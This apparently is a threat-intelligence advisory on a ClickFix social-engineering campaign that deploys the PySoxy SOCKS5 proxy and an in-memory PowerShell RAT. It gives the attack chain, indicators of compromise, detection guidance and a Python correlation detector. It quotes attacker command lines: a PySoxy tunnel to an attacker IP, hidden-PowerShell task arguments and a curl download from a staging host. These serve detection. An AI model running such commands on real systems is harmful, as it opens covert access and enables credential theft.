ClickFix Campaign Evolves with PySoxy SOCKS5 Proxy Deployment
May 18th, 2026
High

Our Cyber Threat Intelligence Unit is monitoring an evolving ClickFix malware campaign that uses PySoxy, an open-source Python SOCKS5 proxy tool, to allow covert remote access and proxy-based communications on compromised systems. First documented by ReliaQuest in April 2026, this is the first known instance of ClickFix being combined with PySoxy-based proxying. The campaign uses social engineering to trick users into executing malicious commands from compromised websites, allowing attackers to deploy payloads and establish persistence without traditional exploit chains. The intrusion chain establishes scheduled task persistence, launches an in-memory PowerShell command-and-control agent, and introduces PySoxy as a second encrypted access path. This creates a modular, redundant foothold that can survive initial blocking attempts. The campaign targets Microsoft Windows environments and has facilitated credential theft, internal reconnaissance, and follow-on payload delivery. Organizations should treat ClickFix-related activity as a significant intrusion risk and strengthen controls around script execution, user awareness, endpoint monitoring, and outbound proxy traffic inspection.
Technical Details
Threat Type: Social Engineering / Malware Delivery with SOCKS5 Proxy Abuse
Severity: High
Affected Systems: Microsoft Windows endpoints; enterprise environments where users can execute scripts or commands manually; networks vulnerable to proxy-based tunneling activity.
Tools Observed:
PowerShell (in-memory RAT)
PySoxy (open-source Python SOCKS5 proxy, compiled bytecode)
Scheduled tasks
Python runtime and compiled bytecode files (.pyc)
curl.exe (staging and exfiltration)
Threat Actor: Unattributed; ClickFix-associated threat operators (attribution remains ongoing)
Attack Chain:
Initial Access: A user visited a compromised website delivering a ClickFix prompt and was deceived into executing an obfuscated PowerShell command launched from explorer.exe.
The campaign relies entirely on social engineering rather than software exploitation.
Execution: The PowerShell stager retrieved and executed a secondary payload in memory without writing to disk.
This payload functioned as a lightweight RAT, polling the attacker's C2 infrastructure every 3 seconds to receive and execute commands.
Staged files, including the PySoxy bytecode (b64.pyc), were written to C:\ProgramData. PySoxy was then executed via:
python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97
This established a second, independent encrypted proxy tunnel to attacker infrastructure over port 443.
Persistence: A scheduled task was created to relaunch the PowerShell RAT approximately every 40 minutes using the following arguments:
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden
This allowed the intrusion to survive process termination and C2 blocking.
Discovery: Built-in Windows tools were used to enumerate user group memberships, domain roles, and domain controllers (nltest.exe /dclist).
LDAP-based machine enumeration and SMB activity against discovered systems were also observed.
Reconnaissance output was staged to C:\ProgramData and exfiltrated via curl.
Defense Evasion: PySoxy traffic blends with normal encrypted outbound activity. Reliance on trusted system interpreters (PowerShell, Python) avoids dropping traditionally detectable binaries.
Individual behaviors in this chain appear benign in isolation; correlation across stages is required to identify the intrusion.
Post-Exploitation:
Credential harvesting from browsers, local stores, and authentication tokens
Remote command execution through SOCKS5-tunneled channels
Internal reconnaissance and lateral movement via compromised endpoints
Potential delivery of additional malware families and data exfiltration through proxied channels

Impact
Credential and Secrets Compromise: PySoxy-based proxy access allows theft of sensitive data, including API keys, authentication tokens, browser-stored credentials, SSH keys, and cloud service access details from compromised endpoints.
Network Proxy Abuse: Infected systems can be converted into covert SOCKS5 proxy nodes, allowing attackers to route malicious traffic through internal networks while concealing their true origin.
Lateral Movement: Compromised endpoints can serve as pivot points to scan internal networks, access shared resources, and move laterally using authenticated sessions or harvested credentials.
Command and Control Evasion: The SOCKS5 proxy layer allows attackers to tunnel communications through legitimate-looking encrypted traffic, making detection of outbound C2 activity significantly more difficult.
Data Exfiltration: Sensitive organizational data may be exfiltrated through encrypted or proxied channels, bypassing traditional perimeter-based security controls.
Persistent Unauthorized Access: The scheduled task persistence mechanism allows the intrusion to outlast initial blocking attempts, with the task continuing to re-execute the PowerShell RAT approximately every 40 minutes even after outbound C2 connections are disrupted.
Security Visibility Loss: The use of legitimate open-source tooling blended with normal system interpreter activity reduces endpoint and network detection effectiveness, increasing attacker dwell time.
Detection Method
Security teams should monitor endpoint, network, and user activity telemetry for the following behavioral indicators:
Endpoint and Process Monitoring:
Monitor process execution events (e.g., Sysmon Event ID 1) for suspicious PowerShell (powershell.exe), Windows Command Shell (cmd.exe), or Python (python.exe) processes launched from browser processes, document readers, or user-initiated scripts.
Detect execution of obfuscated or encoded PowerShell commands initiated directly from user desktop sessions, particularly commands launched from explorer.exe.
Flag creation of compiled Python bytecode files (.pyc) or unknown Python components staged to C:\ProgramData or other non-standard directories.
Identify scheduled tasks created shortly after suspicious PowerShell execution, particularly those referencing Python interpreters or proxy-related executables and using arguments such as -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden.
Monitor for PowerShell-to-Python execution chains, including PowerShell launching curl.exe, downloading .pyc files, or spawning python.exe.
Detect Python command lines containing proxy-style arguments such as -ssl, -remote_ip, -remote_port, or .pyc execution from non-standard paths.
Network and Proxy Monitoring:
Detect outbound traffic consistent with SOCKS5 proxy tunneling behavior, including persistent long-lived encrypted connections over port 443 originating from Python processes.
Monitor for unusual encrypted or tunneled traffic from user endpoints that bypasses standard web proxy inspection.
Flag repeated or high-frequency outbound connections (e.g., polling every few seconds) to unknown infrastructure following script execution events.
Identify endpoints acting as internal relay nodes forwarding traffic between internal and external networks.
User and Web Activity Monitoring:
Monitor for user interaction with websites displaying ClickFix-style prompts that instruct command execution, including fake error messages or "verification required" pages.
Detect clipboard copy-and-execute behavior involving PowerShell or command-line instructions originating from browser sessions.
Post-Persistence Hunting:
After detecting ClickFix-style activity, do not treat a blocked C2 connection as containment.
Review all scheduled tasks created around the time of initial execution and validate their triggers, actions, and referenced paths.
Hunt for C:\ProgramData staging artifacts, including PowerShell scripts and .pyc bytecode files.
Review domain reconnaissance indicators, including whoami /groups, nltest.exe /dclist, LDAP enumeration commands, and anomalous SMB activity following initial compromise.
Indicators of Compromise
Indicator Type | Indicator | Description |
IP Address | 185.205.211[.]217 | ClickFix infrastructure IP |
IP Address | 206.206.103[.]106 | Staging and exfiltration IP |
IP Address | 206.206.103[.]120 | PowerShell RAT C2 |
IP Address | 167.99.158[.]97 | PySoxy proxy destination IP |
Domain | strapness[.]com | ClickFix stager domain |
Domain | overlateise[.]com | Hosted ClickFix script injected into compromised site |
Domain | abledom[.]net | Secondary C2 domain |

Recommendations
Organizations should take the following actions:
User Awareness and Containment:
Educate users to avoid executing commands copied from browser pages, pop-ups, or verification-style prompts.
ClickFix campaigns rely on social engineering and clipboard-based execution rather than software exploitation; user awareness is the primary prevention layer.
Isolate endpoints where suspicious PowerShell or Python execution was observed following user interaction with web content.
Do not treat a blocked outbound connection as containment, as the scheduled task persistence mechanism can continue re-executing the attack chain for hours after C2 blocking.
Endpoint Investigation:
Perform a full forensic review of affected systems to identify malicious PowerShell or Python execution chains, staged .pyc files, and scheduled task artifacts.
Inspect C:\ProgramData for staged scripts, compiled Python bytecode, and exfiltration-related log files.
Remove all components supporting re-execution, including scheduled tasks, staged PowerShell scripts, Python runtimes, and .pyc bytecode files.
Leaving any single component in place may allow the intrusion to resume.
Network Containment:
Block and monitor outbound connections associated with SOCKS5 proxy behavior, particularly long-lived encrypted sessions over port 443 originating from Python processes.
Implement inspection for anomalous tunneling traffic that bypasses corporate proxy infrastructure.
Flag endpoints generating high-frequency outbound connection attempts shortly after script execution events.
Credential Protection:
Reset and rotate credentials for affected users, including browser-stored passwords, cloud service logins, SSH keys, and locally cached authentication tokens.
Enforce MFA across all critical systems to reduce the risk of credential reuse from compromised endpoints.
Monitoring and Detection Improvements:
Develop correlation rules that link the full attack chain:
browser activity → clipboard-initiated PowerShell execution → scheduled task creation → file writes to C:\ProgramData → Python proxy execution.
Individual signals may appear benign in isolation; cross-stage correlation is required for reliable detection.
Alert on Python processes using proxy-style arguments such as -ssl, -remote_ip, or -remote_port.
Monitor for high-frequency PowerShell outbound beaconing (polling intervals of seconds) indicative of an in-memory RAT.
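Cross-stage correlation of the kind called for in the Detection Method section and in the Monitoring and Detection Improvements items above, as an added example that is not part of this advisory or of any vendor tooling. It runs over constructed Sysmon/Security-style records; the record fields, the stage names and the 90-minute window are this example's assumptions.

```python
import re
from collections import defaultdict

# Stage predicates over one normalised record; the shape (host, ts in minutes, type, parent, image, cmdline) is this example's own.
_PS_HIDDEN = re.compile(r"-NoProfile\b.*-ExecutionPolicy\s+Bypass\b.*-WindowStyle\s+Hidden", re.I)
_PROXY_ARGS = re.compile(r"(?:^|\s)-(?:ssl|remote_ip|remote_port)\b", re.I)
_PROGDATA_PYC = re.compile(r"c:\\programdata\\[^\s\"']*\.pyc", re.I)

def _ends(e, key, name):          # case-insensitive image/parent path suffix check
    return e.get(key, "").lower().endswith(name)

STAGES = [  # (stage name, predicate); one event may satisfy several stages
    # Initial access: PowerShell launched from explorer.exe (pasted ClickFix command).
    ("explorer_to_powershell", lambda e: e["type"] == "process" and _ends(e, "image", "powershell.exe") and _ends(e, "parent", "explorer.exe")),
    # Persistence: task-creation record whose action carries the hidden-PowerShell arguments.
    ("hidden_powershell_task", lambda e: e["type"] == "task_created" and bool(_PS_HIDDEN.search(e["cmdline"]))),
    # Staging: PowerShell spawning curl.exe, and any .pyc referenced under C:\ProgramData.
    ("powershell_to_curl", lambda e: e["type"] == "process" and _ends(e, "image", "curl.exe") and _ends(e, "parent", "powershell.exe")),
    ("programdata_pyc", lambda e: bool(_PROGDATA_PYC.search(e["cmdline"]))),
    # Proxy execution: python.exe with PySoxy-style -ssl / -remote_ip / -remote_port arguments.
    ("python_proxy_args", lambda e: e["type"] == "process" and _ends(e, "image", "python.exe") and bool(_PROXY_ARGS.search(e["cmdline"]))),
]

def correlate(events, window_min=90, min_stages=3):
    """Return {host: sorted stages} for hosts hitting >= min_stages distinct stages within any window_min-minute window."""
    hits = defaultdict(list)                           # host -> [(ts, stage)]
    for e in events:
        hits[e["host"]].extend((e["ts"], n) for n, p in STAGES if p(e))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):              # slide the window from each hit
            stages = {s for t, s in seq[i:] if t - t0 <= window_min}
            if len(stages) >= min_stages:              # isolated single signals never alert
                alerts[host] = sorted(stages)
                break
    return alerts

_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; the defanged IPs are the advisory's own
    {"host": "WS01", "ts": 0, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": _PS, "cmdline": "powershell.exe -w hidden -enc <CONSTRUCTED_BASE64>"},
    {"host": "WS01", "ts": 1, "type": "process", "parent": _PS, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\b64.pyc hxxp://206.206.103[.]106/b64.pyc"},
    {"host": "WS01", "ts": 2, "type": "task_created", "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\ProgramData\\run.ps1"},
    {"host": "WS01", "ts": 3, "type": "process", "parent": _PS, "image": r"C:\Python312\python.exe",
     "cmdline": "python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97"},
    {"host": "ADM02", "ts": 5, "type": "process", "parent": r"C:\Windows\explorer.exe", "image": _PS, "cmdline": "powershell.exe"},  # lone signal
]
```

With the sample records, WS01 trips all five stages inside one window and ADM02's lone explorer-to-PowerShell launch is ignored, which is the point of requiring cross-stage correlation rather than alerting on any single behaviour.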
Incident Response:
Treat ClickFix incidents that include scheduled task persistence and secondary tooling as active compromise investigations, not isolated user-execution events.
Initiate host isolation, memory capture, and full artifact review before declaring containment.
Conclusion
The ClickFix campaign documented by ReliaQuest in April 2026 marks a significant advancement in ClickFix techniques, shifting from single-use execution to a modular, multi-stage post-exploitation framework. Attackers used PySoxy, an open-source Python SOCKS5 proxy, along with an in-memory PowerShell RAT and scheduled-task persistence to establish redundant access paths that remained active for hours after initial C2 blocking. As a result, network-level blocking alone is not sufficient for containment. Organizations should treat ClickFix incidents involving persistence or secondary tools as full-scale compromises, prioritizing host isolation, thorough artifact removal, and behavioral detection across all stages to disrupt the entire access chain.